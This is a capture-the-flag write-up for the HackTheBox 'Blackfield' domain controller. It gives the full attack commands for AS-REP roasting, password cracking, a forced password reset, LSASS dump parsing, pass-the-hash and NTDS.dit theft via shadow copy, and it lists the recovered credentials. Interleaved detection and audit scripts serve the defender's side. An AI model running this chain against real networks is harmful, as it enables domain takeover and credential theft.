## Box Info

| Field | Value |
|---|---|
| Platform | HackTheBox |
| Difficulty | Hard |
| OS | Windows (Domain Controller) |
| Key Techniques | AS-REP Roasting, ForceChangePassword, LSASS Dump Analysis, VSS + NTDS.dit |
## Attack Path Summary
SMB null session on profiles$ share → extracted ~300 potential usernames → AS-REP Roasted support account → cracked hash → BloodHound showed support has ForceChangePassword over audit2020 → changed password via rpcclient → audit2020 had access to forensic SMB share → found lsass.DMP → pypykatz extracted svc_backup NTLM hash → evil-winrm as svc_backup → SeBackupPrivilege → diskshadow VSS snapshot → robocopy /b NTDS.dit → secretsdump → Domain Admin.
Longest chain I’ve done. Every step built on the last one.
## Enumeration

```bash
sudo nmap -sCV -p 53,88,135,389,445,593,3268,5985 -Pn -T4 $ip
```
| Port | Service | Notes |
|---|---|---|
| 88 | Kerberos | DC confirmed |
| 389 | LDAP | Domain: BLACKFIELD.local |
| 445 | SMB | Signing required |
| 5985 | WinRM | Used for shell |
### SMB — Username Harvest

```bash
smbclient //$ip/profiles$ -U '' -N -c 'ls' | awk '{print $1}' | grep -v '^\.' | grep -v '^$' | grep -v 'blocks' > users.txt
# ~300 potential usernames from profiles$ share
```
## Foothold — AS-REP Roasting

```bash
impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -usersfile users.txt -format hashcat -outputfile asrep.txt
# support account has no preauth → got hash
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# Cracked: #00^BlackKnight
```

First creds: `support:#00^BlackKnight`
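The defender's view of this step, as an added example that is not part of the writeup: the roast only works because `support` has "Do not require Kerberos preauthentication" set (the `DONT_REQ_PREAUTH` bit, 0x400000, in `userAccountControl`), and every TGT the DC hands out without pre-auth lands in the security log as event 4768 with Pre-Authentication Type 0. The user records and 4768 lines below are constructed for the example; the pipe-separated key=value shape is an assumption, not a real log format.

```python
"""Added example (not from the Blackfield writeup): find the exposure AS-REP
roasting relies on and spot the roast itself in DC security logs.

Assumptions (all constructed): user records are dicts shaped like an LDAP export
with a userAccountControl value; 4768 events are pipe-separated key=value lines.
"""

DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit that makes an account roastable
ACCOUNTDISABLE = 0x2

# Constructed directory export. "support" mirrors the writeup's finding.
SAMPLE_USERS = [
    {"sAMAccountName": "support",   "userAccountControl": 0x400200},  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    {"sAMAccountName": "audit2020", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_old",   "userAccountControl": 0x400202},  # roastable flag set, but disabled
]

# Constructed 4768 (TGT request) events. PreAuthType 0 = no pre-authentication,
# TicketEncryptionType 0x17 = RC4-HMAC, which is the hash shape hashcat -m 18200 cracks.
SAMPLE_4768 = [
    "EventID=4768|TargetUserName=support|PreAuthType=0|TicketEncryptionType=0x17|IpAddress=10.10.14.5|Status=0x0",
    "EventID=4768|TargetUserName=audit2020|PreAuthType=2|TicketEncryptionType=0x12|IpAddress=10.10.10.192|Status=0x0",
    "EventID=4768|TargetUserName=nobody|PreAuthType=0|TicketEncryptionType=0x17|IpAddress=10.10.14.5|Status=0x6",
    "EventID=4769|TargetUserName=audit2020|PreAuthType=2|TicketEncryptionType=0x12|IpAddress=10.10.10.192|Status=0x0",
]


def roastable_accounts(users):
    """Enabled accounts with DONT_REQ_PREAUTH set. Clearing the flag removes the exposure."""
    return sorted(
        u["sAMAccountName"] for u in users
        if u["userAccountControl"] & DONT_REQ_PREAUTH
        and not u["userAccountControl"] & ACCOUNTDISABLE
    )


def parse_event(line):
    return dict(field.split("=", 1) for field in line.split("|"))


def asrep_roast_hits(lines):
    """Successful 4768s issued without pre-auth (Status 0x0): each one is a crackable
    AS-REP that left the DC. Status 0x6 (unknown principal) is what a username list
    full of guesses produces; it is counted separately as context, not as a hit."""
    hits, unknown = [], 0
    for ev in map(parse_event, lines):
        if ev["EventID"] != "4768" or ev["PreAuthType"] != "0":
            continue
        if ev["Status"] == "0x6":
            unknown += 1
            continue
        hits.append({
            "user": ev["TargetUserName"],
            "src": ev["IpAddress"],
            "rc4": ev["TicketEncryptionType"].lower() == "0x17",
        })
    return hits, unknown


if __name__ == "__main__":
    print("accounts to fix:", roastable_accounts(SAMPLE_USERS))
    hits, unknown = asrep_roast_hits(SAMPLE_4768)
    for h in hits:
        print(f"AS-REP issued without pre-auth: {h['user']} from {h['src']} (RC4={h['rc4']})")
    print(f"{unknown} requests for unknown principals from the same source set")
```

The two functions are deliberately independent: the first is a periodic hygiene check you run against the directory, the second is a detection you run against the log stream. A burst of Status 0x6 4768s from one source followed by a single RC4 no-pre-auth success is exactly the footprint of the `GetNPUsers -usersfile` run above.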
## BloodHound → ForceChangePassword

```bash
bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d BLACKFIELD.local -c All
# BloodHound: support has ForceChangePassword over audit2020
```

Changed audit2020’s password without knowing the original:

```bash
rpcclient -U 'support%#00^BlackKnight' $ip
rpcclient $> setuserinfo2 audit2020 23 'Password@1234'
```
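Two defender-side checks for this edge, as an added example that is not part of the writeup. The ACL right BloodHound labels ForceChangePassword is the `User-Force-Change-Password` extended right (GUID `00299570-246d-11d0-a768-00aa006e0529`), so the first function lists who holds it over someone else's account outside an expected set; the second looks for the event the `setuserinfo2` call leaves behind, 4724 ("An attempt was made to reset an account's password"), which unlike 4723 needs no old password. The ACE tuples, event lines, tier-0 and helpdesk sets are all constructed assumptions.

```python
"""Added example, not from the writeup: audit and detection for the
ForceChangePassword edge BloodHound surfaced (support over audit2020).
Constructed inputs: an ACE export as (trustee, right GUID, target) tuples and
4724/4723 security events as pipe-separated key=value lines."""

# Extended-right GUID for User-Force-Change-Password (BloodHound's ForceChangePassword edge)
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"
TIER0 = {"Domain Admins", "Enterprise Admins", "Administrators"}
HELPDESK = {"helpdesk-svc"}  # constructed: principals expected to reset passwords

SAMPLE_ACES = [  # constructed ACE export
    ("support",       FORCE_CHANGE_PASSWORD, "audit2020"),
    ("Domain Admins", FORCE_CHANGE_PASSWORD, "audit2020"),
    ("helpdesk-svc",  FORCE_CHANGE_PASSWORD, "jdoe"),
    ("support",       "00000000-0000-0000-0000-000000000001", "audit2020"),  # placeholder GUID, unrelated right
]

SAMPLE_EVENTS = [  # constructed: 4724 = administrative reset, 4723 = user changed own password
    "EventID=4724|SubjectUserName=support|SubjectDomainName=BLACKFIELD|TargetUserName=audit2020|TargetDomainName=BLACKFIELD",
    "EventID=4724|SubjectUserName=helpdesk-svc|SubjectDomainName=BLACKFIELD|TargetUserName=jdoe|TargetDomainName=BLACKFIELD",
    "EventID=4723|SubjectUserName=jdoe|SubjectDomainName=BLACKFIELD|TargetUserName=jdoe|TargetDomainName=BLACKFIELD",
]


def ace_audit(aces, expected=TIER0 | HELPDESK):
    """Trustees outside the expected set holding the right over someone else's object.
    Each hit is an edge to remove, not just to watch."""
    return sorted(
        (trustee, target) for trustee, right, target in aces
        if right.lower() == FORCE_CHANGE_PASSWORD and trustee not in expected and trustee != target
    )


def parse_event(line):
    return dict(f.split("=", 1) for f in line.split("|"))


def suspicious_resets(lines, helpdesk=HELPDESK):
    """4724 resets performed by anyone not expected to do them. 4723 is ignored:
    a user changing their own password with the old one is not this edge."""
    return [
        (ev["SubjectUserName"], ev["TargetUserName"])
        for ev in map(parse_event, lines)
        if ev["EventID"] == "4724" and ev["SubjectUserName"] not in helpdesk
    ]


if __name__ == "__main__":
    print("edges to remove:", ace_audit(SAMPLE_ACES))
    print("resets to investigate:", suspicious_resets(SAMPLE_EVENTS))
```

The event only tells you the reset happened; the audit is what stops the next one. A 4724 whose subject is a low-privilege account and whose target is anything with more access than the subject is worth an immediate look, since the old password is never required.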
## Forensic Share → LSASS Dump

audit2020 had access to the forensic SMB share containing memory dumps.

```bash
smbclient //$ip/forensic -U 'BLACKFIELD.local/audit2020%Password@1234'
# Downloaded memory_analysis/lsass.DMP
# WARNING: .zip files were 0 bytes from corrupt mget — use the .DMP directly
```

Extracted credentials from the LSASS dump:

```bash
pypykatz lsa minidump lsass.DMP
# Got svc_backup NTLM hash: 9658d1d1dcd9250115e2205d9f48400d
evil-winrm -i $ip -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
```
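The lesson for whoever owns that share is that an LSASS minidump is credential material and should never sit where an audit account can read it. As an added example that is not part of the writeup, the scan below walks a directory tree and reports minidumps by their `MDMP` magic bytes rather than by extension (so a renamed dump is still found), and separately reports 0-byte files, the symptom the `mget` problem above produced. The directory layout it builds is constructed for the example.

```python
"""Added example, not part of the writeup: find credential-bearing memory dumps
sitting on a file share. Keys on the minidump magic ("MDMP") rather than the
extension, and reports 0-byte files separately. The tree is constructed."""
import tempfile
from pathlib import Path

MINIDUMP_MAGIC = b"MDMP"


def build_sample_tree(root):
    """Constructed stand-in for the 'forensic' share."""
    root = Path(root)
    (root / "memory_analysis").mkdir()
    (root / "tools").mkdir()
    # MDMP magic followed by a version field and padding; enough to look like a dump header
    (root / "memory_analysis" / "lsass.DMP").write_bytes(MINIDUMP_MAGIC + b"\x93\xa7\x00\x00" + b"\x00" * 4096)
    (root / "memory_analysis" / "notes.txt").write_text("triage notes, nothing sensitive\n")
    (root / "memory_analysis" / "export.bin").write_bytes(MINIDUMP_MAGIC + b"\x93\xa7\x00\x00" + b"\x00" * 512)  # renamed dump
    (root / "tools" / "lsass.zip").write_bytes(b"")  # the 0-byte artifact of a failed transfer


def scan_share(root):
    """Return {'minidumps': [(relpath, size)], 'empty': [relpath]} for every file under root."""
    root = Path(root)
    result = {"minidumps": [], "empty": []}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        size = path.stat().st_size
        if size == 0:
            result["empty"].append(rel)
            continue
        with path.open("rb") as fh:
            if fh.read(4) == MINIDUMP_MAGIC:
                result["minidumps"].append((rel, size))
    return result


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_tree(d)
        return scan_share(d)


if __name__ == "__main__":
    for rel, size in demo()["minidumps"]:
        print(f"minidump: {rel} ({size} bytes) - contains secrets of every logged-on user")
    for rel in demo()["empty"]:
        print(f"empty file: {rel} - re-transfer or delete")
```

Point `scan_share` at a mounted share root to use it for real. Anything it lists under `minidumps` should be treated the way the writeup treats it: as a file that yields NTLM hashes to `pypykatz` with no further privilege needed.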
## Privilege Escalation — SeBackupPrivilege → NTDS.dit

svc_backup had SeBackupPrivilege and SeRestorePrivilege. On a DC, that means we can grab NTDS.dit — the domain password database.

The difference:

- `reg save hklm\sam` = local account hashes. Works on any Windows box.
- NTDS.dit = domain password database. Only on DCs. Locked by Active Directory — can’t copy it directly.
- VSS (Volume Shadow Copy) creates a frozen snapshot where NTDS.dit is no longer locked.
### VSS Snapshot + NTDS.dit Copy

```powershell
# Must run from a writable directory — NOT Documents
cd C:\Temp
echo "set context persistent nowriters" | out-file C:\Temp\shadow.dsh -encoding ascii
echo "add volume c: alias pwn" | out-file C:\Temp\shadow.dsh -append -encoding ascii
echo "create" | out-file C:\Temp\shadow.dsh -append -encoding ascii
echo "expose %pwn% z:" | out-file C:\Temp\shadow.dsh -append -encoding ascii
diskshadow /s C:\Temp\shadow.dsh
# Shadow copy created and exposed as Z:\
# Copy NTDS.dit using backup privilege (/b flag bypasses ACLs)
robocopy /b z:\Windows\NTDS\ C:\Temp\ ntds.dit
# Save SYSTEM hive
reg save hklm\system C:\Temp\system
# Download both (evil-winrm built-in)
download ntds.dit
download system
```
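Every command in that sequence spawns a process on the DC, so the whole privesc is visible in process-creation telemetry. As an added example that is not part of the writeup, the detector below tags constructed Sysmon EventID 1 style records (`diskshadow`/`vssadmin create shadow`, a copy tool touching an NTDS path, `reg save` of SYSTEM or SAM) and raises a finding when the same user creates a shadow and copies NTDS.dit within a short window; a lone shadow copy from a backup account stays informational. The records, user names and window are assumptions for the example.

```python
"""Added example, not from the writeup: process-creation detection for the
shadow copy -> NTDS.dit copy -> SYSTEM hive chain. Events are constructed
Sysmon EventID 1 style records (UtcTime, User, Image, CommandLine)."""
import re
from datetime import datetime, timedelta

SAMPLE_EVENTS = [  # constructed
    {"t": "2024-05-01T02:00:00", "user": "BLACKFIELD\\backupsvc", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin create shadow /for=C:"},                       # scheduled backup, shadow only
    {"t": "2024-05-01T10:00:05", "user": "BLACKFIELD\\svc_backup", "image": r"C:\Windows\System32\diskshadow.exe",
     "cmd": r"diskshadow /s C:\Temp\shadow.dsh"},
    {"t": "2024-05-01T10:01:30", "user": "BLACKFIELD\\svc_backup", "image": r"C:\Windows\System32\Robocopy.exe",
     "cmd": r"robocopy /b z:\Windows\NTDS\ C:\Temp\ ntds.dit"},
    {"t": "2024-05-01T10:02:10", "user": "BLACKFIELD\\svc_backup", "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg save hklm\system C:\Temp\system"},
    {"t": "2024-05-01T11:00:00", "user": "BLACKFIELD\\jdoe", "image": r"C:\Windows\System32\Robocopy.exe",
     "cmd": r"robocopy C:\Users\jdoe\Docs \\fileserver\share /e"},   # ordinary file copy, no NTDS path
]

COPY_TOOLS = {"robocopy.exe", "xcopy.exe", "esentutl.exe"}


def classify(ev):
    """Map one process-creation record to a stage of the chain, or None."""
    exe = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmd"].lower()
    if exe == "diskshadow.exe" or (exe == "vssadmin.exe" and "create shadow" in cmd):
        return "shadow"
    if exe in COPY_TOOLS and ("ntds.dit" in cmd or "\\ntds\\" in cmd):
        return "ntds_copy"
    if exe == "reg.exe" and " save " in cmd and re.search(r"hklm\\(system|sam)\b", cmd):
        return "hive_save"
    return None


def detect_chains(events, window=timedelta(minutes=30)):
    """Per user: a shadow followed by an NTDS copy inside the window is the whole
    privesc in one signature; a hive save on top makes it critical. A shadow on
    its own is recorded as info so backup jobs are visible without paging anyone."""
    by_user = {}
    for ev in events:
        tag = classify(ev)
        if tag:
            by_user.setdefault(ev["user"], []).append((datetime.fromisoformat(ev["t"]), tag))
    findings = []
    for user, items in by_user.items():
        tags = {t for _, t in items}
        shadows = [ts for ts, t in items if t == "shadow"]
        copies = [ts for ts, t in items if t == "ntds_copy"]
        chained = any(timedelta(0) <= (c - s) <= window for s in shadows for c in copies)
        if chained:
            findings.append({"user": user, "severity": "critical" if "hive_save" in tags else "high",
                             "tags": sorted(tags)})
        elif "shadow" in tags:
            findings.append({"user": user, "severity": "info", "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in detect_chains(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['user']}: {', '.join(f['tags'])}")
```

Pair this with a periodic check of who actually holds SeBackupPrivilege on domain controllers (Backup Operators membership and any GPO that grants the right); on a DC that privilege is effectively Domain Admin, which is the point of the chain above.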
## Secretsdump → Domain Admin

```bash
impacket-secretsdump -ntds ntds.dit -system system LOCAL
# Got: Administrator:500:...:184fb5e5178480be64824d4cd53b99ee:::
evil-winrm -i $ip -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'
```
## Credentials
| Username | Password/Hash | Source |
|---|---|---|
| support | #00^BlackKnight | AS-REP Roasting |
| audit2020 | Password@1234 | ForceChangePassword |
| svc_backup | 9658d1d1dcd9250115e2205d9f48400d (NTLM) | pypykatz on lsass.DMP |
| Administrator | 184fb5e5178480be64824d4cd53b99ee (NTLM) | secretsdump from NTDS.dit |
## What I Learned

- pypykatz — Linux equivalent of Mimikatz. Parses LSASS memory dumps offline. `pypykatz lsa minidump lsass.DMP` and you get credentials of every user who had a session on that machine.
- VSS + NTDS.dit — on a DC, NTDS.dit is locked by AD. Use diskshadow to create a snapshot, expose it as a drive letter, then `robocopy /b` to copy with backup privileges.
- ForceChangePassword via rpcclient — `setuserinfo2 <user> 23 '<newpass>'` changes any user’s password if you have the ACL right. You don’t need to know the original password.
- SMB `mget` sometimes produces 0-byte files for large files. Always check file sizes. Use the .DMP directly instead of the .zip.
- diskshadow MUST run from a writable directory. Always `cd C:\Temp` first. Not Documents, not Desktop.
- Pattern: “DC box + SeBackupPrivilege = VSS snapshot → robocopy /b NTDS.dit → secretsdump → all domain hashes.”